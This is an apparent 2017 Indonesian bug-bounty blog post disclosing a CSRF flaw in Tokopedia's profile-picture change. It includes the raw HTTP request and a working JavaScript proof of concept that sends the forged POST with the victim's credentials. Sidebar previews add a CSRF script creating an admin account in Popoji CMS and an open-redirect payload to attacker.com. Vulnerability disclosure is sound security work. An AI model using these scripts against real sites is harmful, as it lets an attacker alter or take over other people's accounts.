Tokopedia - CSRF On Change Picture On Tokopedia

CSRF Issue On Tokopedia, 

List of bug on Tokopedia :
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-to-create-new-store-for.html
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-report-item.html
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-on.html
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-login.html
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-open-store.html
Halo,
Saya menemukan sebuah bug CSRF di tokopedia

Pendahuluan
bug ini bisa mengubah user picture di profile picture

POST /ajax/people-4.pl HTTP/1.1
Host: www.tokopedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Referer: https://www.tokopedia.com/people/9946238/edit
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 526
Cookie: <somecookie>
Connection: close

file_path=https%3A%2F%2Fecs7.tokopedia.net%2Fimg%2Fcache%2F300%2Fuser-1%2F2017%2F4%2F7%2F9946238%2F9946238_7ac0357f-05f7-4f32-92a7-b69b9b23956c.png&file_th=https%3A%2F%2Fecs7.tokopedia.net%2Fimg%2Fcache%2F100-square%2Fuser-1%2F2017%2F4%2F7%2F9946238%2F9946238_7ac0357f-05f7-4f32-92a7-b69b9b23956c.png&message_status=0&pic_obj=eyJzZXJ2ZXJfaWQiOiI1MCIsImZpbGVfcGF0aCI6InVzZXItMS8yMDE3LzQvNy85OTQ2MjM4IiwicGljIjoiOTk0NjIzOF83YWMwMzU3Zi0wNWY3LTRmMzItOTJhNy1iNjliOWIyMzk1NmMucG5nIn0%3D&success=1&action=event_upload_profile_picture

Poc Code:
<script>
      function getMe(){
        // retrieve page content
        var xhr = new XMLHttpRequest();

        // now execute the CSRF attack
        xhr.open("POST", "https://www.tokopedia.com/ajax/people-4.pl", true);
        xhr.withCredentials="true";
        xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        xhr.send('file_path=https%3A%2F%2Fecs7.tokopedia.net%2Fimg%2Fcache%2F300%2Fuser-1%2F2017%2F4%2F7%2F9946238%2F9946238_7ac0357f-05f7-4f32-92a7-b69b9b23956c.png&file_th=https%3A%2F%2Fecs7.tokopedia.net%2Fimg%2Fcache%2F100-square%2Fuser-1%2F2017%2F4%2F7%2F9946238%2F9946238_7ac0357f-05f7-4f32-92a7-b69b9b23956c.png&message_status=0&pic_obj=eyJzZXJ2ZXJfaWQiOiI1MCIsImZpbGVfcGF0aCI6InVzZXItMS8yMDE3LzQvNy85OTQ2MjM4IiwicGljIjoiOTk0NjIzOF83YWMwMzU3Zi0wNWY3LTRmMzItOTJhNy1iNjliOWIyMzk1NmMucG5nIn0%3D&success=1&action=event_upload_profile_picture');
        }
</script>
<button onclick="getMe();">Let's Rock</button>

Note: file_path adalah letak foto baru user lain

Bug ini bisa terjadi karena tidak ada verifikasi token untuk pengubahan foto, (hanya di uploadnya aja ada)

Step to reproduce:
- simpan poc code ke .html
- eksekusi kode,
- foto akan digantikan dengan file_path

Jika butuh video, saya upload di :
https://youtu.be/jNE2ECG9DRQ (video sudah saya private)

Timeline: 
- 7 April 2017 => Reporting
- 10 May => Fixing & Ask Document
- Waiting Bounty ( Will be edited )

Comments

Post a Comment

Popular posts from this blog

Missing CSRF Token On Add Admin [Popoji CMS]

Image
Description: This is happen because when request add admin there's no CSRF token Step To Reproduce : <script>function getMe(){ // retrieve page content var xhr = new XMLHttpRequest(); // now execute the CSRF attack xhr.open("POST", "http://root/popoji/poadmin/ route.php?mod=user&act=addnew", true); xhr.withCredentials="true"; xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashan dy21%40gmail.com&no_telp=083833232954&level=1'); } </script> <button onclick="getMe();">Let's Rock</button> 1. Save code to .html 2. upload them to host 3. execute it. Video :  https://www.youtube.com/watch?v=1FXXuSiB6jo Fix & Mitigation : give token when request sensitive action. Note: them give me permission to disclose it, and th
Read more

Open Redirect On Codepolitan.com

Image
Open Redirect On Codepolitan.com Description :  Open redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access. Impact : Force user go to untrusted website from codepolitan website Location of bug :  https://www.codepolitan.com/users/login?callback= Payload : http://attacker.com Reproduce : 1. Open https://www.codepolitan.
Read more

Session not expired When logout [partners.uber.com]

Image
It's funny, when i can reproduce it 4 days ago and make some video, the team said we’re unable to reproduce this issue following the steps you provided. it's i copy - paste with my report on hackerone   Hi, Summary partners.uber.com website is not expiring the user's session immediately after logout. when user logout, the session not expired, and still can send request and the server respond response with OKAY Steps to Reproduce: Log into the website - partners.uber.com Capture any request. For ex, profile edit page using burp proxy. Logout from the website. Replay the request captured in step 2 and notice it displays the proper response. Thanks, the team it's fixed this issue, and say this is was unvalidated issue.but the team won't to disclose report, finally after few roast, team agree to disclose. i try to contact hackerone team with support, because when i want to call hackerone team to my report, there's no option on my report. Last
Read more